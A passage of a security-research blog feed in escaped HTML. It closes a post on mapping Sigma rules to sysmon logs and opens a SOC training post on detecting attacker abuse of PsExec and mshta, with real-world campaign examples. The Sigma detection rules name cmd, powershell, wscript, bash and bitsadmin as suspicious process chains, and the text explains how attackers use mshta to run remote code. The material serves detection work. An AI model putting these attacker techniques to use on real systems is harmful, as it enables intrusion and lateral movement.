&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;product&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;windows&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;service&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;sysmon&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;process_creation_linux&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;category&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;process_creation&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;product&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;linux&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;conditions&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;EventID&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="m"&gt;1&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;rewrite&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;product&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;linux&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;service&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;sysmon&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;The configuration file specifies the fields that will be used in a Sigma rule
and how they will be defined or where they are located in logs that are
generated by sysmon. The way the fields are defined in the rule must fully
match the to the values set in the configuration file.&lt;/p&gt;
&lt;p&gt;The configuration above tells sigmac that for rules that contain logsource with
category process_creation and product windows replace these fields with product
windows and service sysmon. Depending on the OS targeted by the rule, the
compiled output will define the product type. EventID: 1 is added with a
logical AND to the query outputted by sigmac, meaning only events with this
event ID are applicable to this rule. This way rules that didn&amp;rsquo;t use sysmon as
a log source could be integrated into infrastructure that uses sysmon in their
logging and use this rule.&lt;/p&gt;
&lt;p&gt;You might ask yourself why we didn&amp;rsquo;t write the rule with Sysmon as a logsource
from the beginning – and the answer is that we could have done that! There
might be more than one way to write a Sigma rule. We can make the rule target
sysmon logs, so if the users of the rule use sysmon in their environment they
will need minimal effort on their part to integrate it.&lt;/p&gt;
&lt;p&gt;Our mshta rule for sysmon:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nt"&gt;logsource&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;product&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;windows&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;service&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;sysmon&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;detection&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;selection&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;EventID&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="m"&gt;1&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;ParentImage|endswith&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;- &lt;span class="s1"&gt;&amp;#39;svchost.exe&amp;#39;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;- &lt;span class="s1"&gt;&amp;#39;cmd.exe&amp;#39;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;- &lt;span class="s1"&gt;&amp;#39;powershell.exe&amp;#39;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;Image|endswith&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;- &lt;span class="s1"&gt;&amp;#39;mshta.exe&amp;#39;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;condition&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;selection&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;The original example of our mshta rule uses a more &amp;ldquo;general&amp;rdquo; approach: we
didn&amp;rsquo;t specify which logsource to use and the user can convert the rule to fit
his environment by mapping the fields in his configuration file. In the first
example it is up to the user to tune the rule and adjust the rule or the
configuration file while in the last option, we specifically mention which log
source and fields the rules use. Both rules will achieve the same result.&lt;/p&gt;
&lt;h2&gt;Conclusion&lt;span class="hx:absolute hx:-mt-20" id="conclusion"&gt;&lt;/span&gt;
&lt;a href="#conclusion" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;In this blog we presented Sigma rules – a well-defined and formatted structure
for writing detection rules, that can be used in all types of operating systems
and environments. Sigma allows you to share information but also consume it,
making it easier to integrate new detection rules and protect your environment.&lt;/p&gt;</description></item><item><title>Boost Your SOC Skills: How to Detect Good Apps Gone Bad</title><link>https://research.intezer.com/blog/2022/03/boost-your-soc-skills-how-to-detect-good-apps-gone-bad/</link><pubDate>Tue, 01 Mar 2022 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2022/03/boost-your-soc-skills-how-to-detect-good-apps-gone-bad/</guid><description>
&lt;p&gt;Threat actors have a wide range of tools and techniques they can use in cyber
attacks including: malware-as-a-service, open-source tools and malware code,
red team or admin tools. Besides, there is an extended variety of legitimate
tools and features that can be handy for regular users but extremely dangerous
when used by attackers. Trusted applications and signed binaries are beneficial
for attackers because they provide them with stealthy code execution, sometimes
even with high integrity privileges. For an untrained eye the execution of
trusted applications by attackers might go under the radar and not ring the
alarm.&lt;/p&gt;
&lt;p&gt;It is very challenging to detect the usage of legitimate applications by
attackers while avoiding false positive alerts and alert fatigue. Since these
applications are frequently used by the system and endpoint users, it is harder
to detect when an application is exploited by attackers and issue an alert.&lt;/p&gt;
&lt;p&gt;Don&amp;rsquo;t give up, there is a solution. First, as a SOC analyst you need to be
familiar with how trusted tools are used by attackers. Second, you need to know
which detection methods will be effective in your environment and trigger
alerts when attackers are using legitimate tools.&lt;/p&gt;
&lt;p&gt;In this blog we will present several examples of legitimate Windows
applications and utilities that were exploited by threat actors in real-life
attacks. For each tool we will explain how SOC analysts can detect and identify
the usage of these applications by attackers. For each tool we mention, we
suggest or create a basic detection rule that can be compiled to fit your log
source and SIEM platform. Please note that you may need to slightly modify the
rule to better suit your specific log source or SIEM fields in order to use for
your organization.&lt;/p&gt;
&lt;p&gt;On March 16th, we will host a livestream where we will present these and other
techniques including live examples.
&lt;a href="https://www.twitch.tv/intezerlabs"target="_blank" rel="noopener"&gt;Follow us on Twitch to get notified when the livestream starts.&lt;/a&gt;&lt;/p&gt;
&lt;h2&gt;Legitimate Tools Used in Attacks by Threat Actors&lt;span class="hx:absolute hx:-mt-20" id="legitimate-tools-used-in-attacks-by-threat-actors"&gt;&lt;/span&gt;
&lt;a href="#legitimate-tools-used-in-attacks-by-threat-actors" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;h3&gt;Technique Name: PsExec&lt;span class="hx:absolute hx:-mt-20" id="technique-name-psexec"&gt;&lt;/span&gt;
&lt;a href="#technique-name-psexec" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;h4&gt;Analysis&lt;span class="hx:absolute hx:-mt-20" id="analysis"&gt;&lt;/span&gt;
&lt;a href="#analysis" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;PsExec is a command-line utility that is used to execute processes on remote
systems and also redirect the output of console applications. It is part of the
Sysinternals'
&lt;a href="https://docs.microsoft.com/en-us/sysinternals/downloads/pstools"target="_blank" rel="noopener"&gt;PsTools suite&lt;/a&gt;
created by Mark Russinovich. Although intended as a tool to be used only by
administrators. PsExec has been used also by malicious actors. PsExec executes
processes in the following syntax.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;psexec \RemotePCName [-u username[-p password]] command [arguments]&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;The process connects to the remote computer over the SMB ports 445 (TCP) or 139
(UDP), and copies over a service file that is run to set up data transfer
between the remote machine and the PsExec process. When the action is
completed, PsExec stops the service and removes the file.&lt;/p&gt;
&lt;h4&gt;Real Life Example&lt;span class="hx:absolute hx:-mt-20" id="real-life-example"&gt;&lt;/span&gt;
&lt;a href="#real-life-example" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;&lt;a href="../../../2017/10/notpetya-returns-bad-rabbit"&gt;NotPetya&lt;/a&gt; was a famous
ransomware attack that occurred in 2017. It infected thousands of
organizations, with over 80% of the victims located in Ukraine, causing
billions of dollars worth of damage. NotPetya contained an
&lt;a href="https://www.crowdstrike.com/blog/petrwrap-ransomware-technical-analysis-triple-threat-file-encryption-mft-encryption-credential-theft/"target="_blank" rel="noopener"&gt;embedded modified version&lt;/a&gt;
of PsExec. PsExec was used for remote execution and lateral movement across
networks. The credentials were gathered by a credential theft module that was
able to extract usernames and passwords from the LSASS process.&lt;/p&gt;
&lt;p&gt;The Russian threat group APT29 (Cozy Bear) has also
&lt;a href="https://www.welivesecurity.com//srv/htdocs/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf"target="_blank" rel="noopener"&gt;used&lt;/a&gt;
PsExec to laterally move across networks and deploy their custom backdoor
FatDuke.&lt;/p&gt;
&lt;h4&gt;How to Detect&lt;span class="hx:absolute hx:-mt-20" id="how-to-detect"&gt;&lt;/span&gt;
&lt;a href="#how-to-detect" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;One way to detect PsExec is to detect the creation of a new service. A new
service created in Windows will generate an event in the Windows Security logs
with the code of 7045. The default name for the PsExec service is PSEXESVC. We
created a Sigma rule that will alert when an Event ID 7045 will be triggered by
a service with the name PSEXESVC.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;title: Generic PSEXESVC Service Execution or Creation
author: Intezer
logsource:
product: windows
service: system
detection:
service_installation:
EventID: 7045
Provider_Name: &amp;#39;Service Control Manager&amp;#39;
ServiceName: &amp;#39;PSEXESVC&amp;#39;
ServiceFileName|endswith: &amp;#39;PSEXESVC.exe&amp;#39;
service_execution:
EventID: 7036
Provider_Name: &amp;#39;Service Control Manager&amp;#39;
param1: &amp;#39;PSEXESVC&amp;#39;
param2: &amp;#39;running&amp;#39;
condition: service_installation or service_execution&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;Another way to detect is the creation of named pipes, created by the service,
that is set up to facilitate communication between the PsExec process and the
service on the remote host. There are multiple formats that can be created:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;PSEXESVC-&amp;lt;computer_name&amp;gt;-&amp;lt;random_digits&amp;gt;-&amp;lt;stdin|stdout|stderr&amp;gt;
PSEXESVC&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;Creation of a PsExec named pipe can be detected through the following Sigma
rule:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;title: PsExec Service Named Pipe Creation
author: Intezer
logsource:
product: windows
category: pipe_created
detection:
selection_PSEXESVC:
PipeName|contains|all:
- &amp;#39;PSEXESVC&amp;#39;
selection_stdin:
PipeName|endswith: &amp;#39;-stdin&amp;#39;
selection_stdout:
PipeName|endswith: &amp;#39;-stdout&amp;#39;
selection_stderr:
PipeName|endswith: &amp;#39;-stderr&amp;#39;
condition: selection_PSEXESVC and 1 of selection_std*&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;The above rules may help if PsExec is not a tool in use by your organization,
but if it is in common use, there are other rules that may help detect
malicious variants. To detect the use of a renamed or variant of PsExec, you
can use this Sigma rule:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://github.com/SigmaHQ/sigma/blob/eb382c4a59b6d87e186ee269805fe2db2acf250e/rules/windows/builtin/security/win_susp_psexec.yml"target="_blank" rel="noopener"&gt;https://github.com/SigmaHQ/sigma/blob/eb382c4a59b6d87e186ee269805fe2db2acf250e/rules/windows/builtin/security/win_susp_psexec.yml&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;Technique Name: MSHTA&lt;span class="hx:absolute hx:-mt-20" id="technique-name-mshta"&gt;&lt;/span&gt;
&lt;a href="#technique-name-mshta" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;h4&gt;Analysis&lt;span class="hx:absolute hx:-mt-20" id="analysis-1"&gt;&lt;/span&gt;
&lt;a href="#analysis-1" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;mshta.exe is a Windows-native binary that executes VBScript or JavaScript
embedded within Microsoft HTML Application (HTA) files. Using a legitimate and
signed binary as mshta gives attackers the means to execute arbitrary code
stored on a remote server while bypassing browser security settings. When
mashta is leveraged by attackers it is invoked through files such as lnk files
and the malicious payload is executed using inline command line arguments or
files that are stored on a remote server.&lt;/p&gt;
&lt;h4&gt;Real Life Example&lt;span class="hx:absolute hx:-mt-20" id="real-life-example-1"&gt;&lt;/span&gt;
&lt;a href="#real-life-example-1" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;&lt;a href="https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf"target="_blank" rel="noopener"&gt;Operation Cobalt Kitty&lt;/a&gt;
(APT 32) used mshta to execute Cobalt Strike beacons for the
reconnaissancereconsense stage and download further payloads.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.fortinet.com/blog/threat-research/phishing-campaign-targeting-korean-to-deliver-agent-tesla-new-variant"target="_blank" rel="noopener"&gt;Agen Tesla&lt;/a&gt;
uses decoy documents containing VBA macro that calls mshta to download the
first stage of the attack. Afterwards the malware creates a scheduled task to
download and execute a new version of the malware using mshta.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/"target="_blank" rel="noopener"&gt;BabyShark&lt;/a&gt;
malware, associated with North Korean threat actors, in the first stage of the
attack they used a decoy document with VBA macro code that used mshta to
download from a remote server HTA file that will execute the first stage of the
attack. Later they used mshta in the persistence logic to execute further
commands from the command and control server (C2).&lt;/p&gt;
&lt;h4&gt;How to detect&lt;span class="hx:absolute hx:-mt-20" id="how-to-detect-1"&gt;&lt;/span&gt;
&lt;a href="#how-to-detect-1" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;When mshta is used by threat actors it can be invoked by different legitimate
applications. For example phishing documents will execute mshta directly or
using other processes such as powershell or cmd.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/03/boost-your-soc-skills-how-to-detect-good-apps-gone-bad/images/fig1.png" title="Screenshot of process hacker when mshta is executed by a malicious Microsoft Word document." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Screenshot of process hacker when mshta is executed by a malicious Microsoft Word document.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;To identify the usage of mshta by threat actors we need to monitor and alert
upon execution of mshta by suspicious processes and execution of suspicious
processes by mshta (such as wscript). You can use the Sigma rule below to
detect this type of execution:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;title: Suspicious process execution for mshta
author: Intezer
logsource:
category: process_creation
product: windows
detection:
selection1:
Image: &amp;#39;*mshta.exe&amp;#39;
ParentImage|endswith:
- &amp;#39;winword.exe&amp;#39;
- &amp;#39;excel.exe&amp;#39;
- &amp;#39;powerpnt.exe&amp;#39;
- &amp;#39;cmd.exe&amp;#39;
- &amp;#39;powershell.exe&amp;#39;
- &amp;#39;wscript.exe&amp;#39;
- &amp;#39;cscript.exe&amp;#39;
- &amp;#39;sh.exe&amp;#39;
- &amp;#39;bash.exe&amp;#39;
- &amp;#39;reg.exe&amp;#39;
- &amp;#39;regsvr32.exe&amp;#39;
- &amp;#39;BITSADMIN*&amp;#39;
selection2:
ParentImage: &amp;#39;*mshta.exe&amp;#39;
Image:
- &amp;#39;*cmd.exe&amp;#39;
- &amp;#39;*powershell.exe&amp;#39;
- &amp;#39;*wscript.exe&amp;#39;
- &amp;#39;*cscript.exe&amp;#39;
- &amp;#39;*sh.exe&amp;#39;
- &amp;#39;*bash.exe&amp;#39;
- &amp;#39;*reg.exe&amp;#39;
- &amp;#39;*regsvr32.exe&amp;#39;
- &amp;#39;*BITSADMIN*&amp;#39;
condition: selection1 or selection2
fields:
- CommandLine
- ParentCommandLine&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;Attackers masquerade the usage of mshta by
&lt;a href="https://attack.mitre.org/techniques/T1036/003/"target="_blank" rel="noopener"&gt;renaming&lt;/a&gt; the binary to
something less obvious and suspicious, so you should monitor events of changes
in the path or the name of system utilities. In our signature we are using the
process image name.&lt;/p&gt;
&lt;p&gt;Usually mshtaat execution contains command line arguments and url pointing to
remote hosting servers in the signature. Below we look for these suspicious
arguments:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
